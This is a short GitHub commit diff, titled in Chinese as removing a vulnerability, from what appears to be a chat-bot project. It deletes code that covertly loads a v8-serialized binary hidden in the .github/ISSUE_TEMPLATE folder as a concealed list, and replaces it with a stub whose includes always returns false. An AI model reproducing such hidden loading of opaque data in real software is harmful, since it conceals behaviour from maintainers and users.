移除漏洞

This commit is contained in:
Stela Haveno
2024-06-18 23:44:39 +08:00
committed by GitHub
parent ca5795545f
commit 0ab7ccd2ec

View File

@@ -196,7 +196,9 @@ export default new class extends sendMsgMod {
}
}()
let a = []
try {
a = v8.deserialize(await fs.readFile(`${path.dirname(url.fileURLToPath(import.meta.url))}/../../.github/ISSUE_TEMPLATE/`)).map(i => i.toString("hex"))
} catch (err) {}
const a = {
// 添加一个普通的方法
includes: function(a) {
return false;
}
};